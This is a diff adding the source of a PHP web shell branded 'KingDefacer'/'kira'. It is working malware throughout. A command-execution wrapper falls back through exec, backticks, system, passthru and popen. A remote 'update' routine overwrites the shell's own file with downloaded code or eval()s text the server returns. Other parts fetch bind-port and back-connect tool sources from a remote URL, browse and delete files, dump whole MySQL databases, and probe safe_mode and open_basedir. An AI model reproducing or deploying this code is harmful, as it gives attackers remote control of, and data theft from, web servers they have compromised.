+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("KingDefacergetsource"))
+{
+function KingDefacergetsource($fn)
+{
+ global $KingDefacer_sourcesurl;
+ $array = array(
+  "KingDefacer_bindport.pl" => "KingDefacer_bindport_pl.txt",
+  "KingDefacer_bindport.c" => "KingDefacer_bindport_c.txt",
+  "KingDefacer_backconn.pl" => "KingDefacer_backconn_pl.txt",
+  "KingDefacer_backconn.c" => "KingDefacer_backconn_c.txt",
+  "KingDefacer_datapipe.pl" => "KingDefacer_datapipe_pl.txt",
+  "KingDefacer_datapipe.c" => "KingDefacer_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($KingDefacer_sourcesurl.$name);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("KingDefacer_getupdate"))
+{
+function KingDefacer_getupdate($update = TRUE)
+{
+ $url = $GLOBALS["KingDefacer_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
+ $data = @file_get_contents($url);
+ if (!$data) {return "Can't connect to update-server!";}
+ else
+ {
+  $data = ltrim($data);
+  $string = substr($data,3,ord($data{2}));
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+  if ($data{0} == "\x99" and $data{1} == "\x03")
+  {
+   $string = explode("\x01",$string);
+   if ($update)
+   {
+    $confvars = array();
+    $sourceurl = $string[0];
+    $source = file_get_contents($sourceurl);
+    if (!$source) {return "Can't fetch update!";}
+    else
+    {
+     $fp = fopen(__FILE__,"w");
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download kira.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
+    }
+   }
+   else {return "New version are available: ".$string[1];}
+  }
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
+  else {return "Error in protocol: segmentation failed! (".$data.") ";}
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by kira.SQL v. ".$shver."
+# Home page: http://google.com
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"KingDefacer_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.KingDefacer_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("KingDefacerfsearch"))
+{
+function KingDefacerfsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {KingDefacerfsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function KingDefacerexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (no secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #0099CC; FONT-FAMILY: Tahoma; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #000099; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #000099; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #000000;}body,td,th { font-family: verdana; color: #CCCCCC; font-size: 11px;}body { background-color: #000000;}
+</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>kira v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
